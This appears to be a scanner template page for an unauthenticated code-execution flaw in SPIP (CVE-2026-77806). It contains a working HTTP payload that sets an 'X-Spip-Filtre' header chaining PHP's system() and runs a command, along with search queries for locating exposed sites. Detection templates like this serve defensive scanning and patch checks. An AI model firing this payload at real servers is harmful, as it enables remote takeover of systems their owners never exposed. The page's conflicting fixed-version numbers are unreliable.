SPIP < 4.4.22 - Unauthenticated RCE
CVE-2026-77806
Early Release
Description
SPIP < 4.4.21 contains a remote code execution caused by mishandling of the X-Spip-Filtre HTTP request header in analyse_resultat_skel, letting unauthenticated remote attackers execute arbitrary code.
Severity
Critical
CVSS Score
9.8
Exploit Probability
4%
Published Date
August 25, 2026
Template Author
0x_akoko
CVE-2026-77806.yaml
id: CVE-2026-77806
info:
name: SPIP < 4.4.22 - Unauthenticated RCE
author: 0x_Akoko
severity: critical
description: |
SPIP < 4.4.21 contains a remote code execution caused by mishandling of the X-Spip-Filtre HTTP request header in analyse_resultat_skel, letting unauthenticated remote attackers execute arbitrary code.
impact: |
Unauthenticated remote attackers can execute arbitrary code, potentially leading to full system compromise.
remediation: |
Update to version 4.4.21 or later.
reference:
- https://securityonline.info/cve-2026-77806-spip-unauthenticated-rce/
- https://blog.spip.net/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-77806
epss-score: 0.04201
epss-percentile: 0.90234
cwe-id: CWE-94
metadata:
max-request: 1
verified: true
shodan-query: http.component:"SPIP"
fofa-query: body="spip.php"
tags: cve,cve2026,spip,rce,unauth,vkev
variables:
marker: "{{rand_text_alphanumeric(8)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /spip.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(tolower(body), "spip.php", "spip_document", "spip_logo")'
condition: and
internal: true
- raw:
- |
POST /spip.php?page=sommaire&{{rand_text_alpha(8)}}=%3C%3Fphp%20header(%22X-Spip-Filtre:%20intval|_request|system%22);%20%3F%3E HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
0=echo {{marker}}
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{marker}}")'
condition: and
# digest: 490a004630440220521f4966394671103f125fbdcc80d66ddb2e83366a69c533b15437a7b72576b2022042ef54e0759f08f5b4b99e93a0062a80120bc0df09c0cd4ad9caf85da25dc053:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-77806
CWE ID:
cwe-94
Remediation Steps
Update to version 4.4.21 or later.